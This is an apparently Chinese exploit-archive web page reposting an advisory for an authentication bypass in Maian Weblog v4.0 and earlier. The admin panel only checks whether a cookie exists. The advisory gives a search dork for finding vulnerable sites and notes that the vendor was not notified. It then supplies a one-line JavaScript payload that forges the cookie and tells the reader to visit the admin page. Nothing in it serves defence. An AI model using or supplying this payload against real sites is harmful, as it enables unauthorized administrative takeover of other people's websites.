首页
 导航
语文
作文
 手机
客服中心
投稿赚钱
免费注册
首页
当前位置:查字典教程网 >网络安全 >Exploit >Maian Weblog
Maian Weblog
摘要:-[*]==================================================================...

-[*] ================================================================================ [*]-

-[*] Maian Weblog <= v4.0 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

[*] Discovered By: S.W.A.T.

[*] E-Mail: svvateam[at]yahoo[dot]com

[*] Script Download: http://www.maianscriptworld.co.uk

[*] DORK: Powered by Maian Weblog v4.0

[*] Vendor Has Not Been Notified!

[*] DESCRIPTION:

Maian Weblog suffers from a insecure cookie, the admin panel only checks if the cookie

exists.

and not the content. so we can easyily craft a cookie and look like a admin.

[*] Vulnerability:

javascript:document.cookie = "weblog_cookie=1; path=/";

[*] NOTE/TIP:

after running the javascript, visit "/admin/index.php" to view admin area.

-[*] ================================================================================ [*]-

-[*] Maian Weblog <= v4.0 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

【Maian Weblog】相关文章:

ESET Smart Security 3.0.667.0 Privilege Escalation PoC

Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

Comdev Web Blogger

Maian Recipe

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)

Maian Uploader

Galatolo Web Manager 1.3a

Linux Kernel

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

上一篇: Maian Search
相关阅读
更多>>
网友关注
更多>>
网友最新关注视频
更多>>
精品推荐
分类导航
网络安全子分类
最新Exploit学习
热门Exploit学习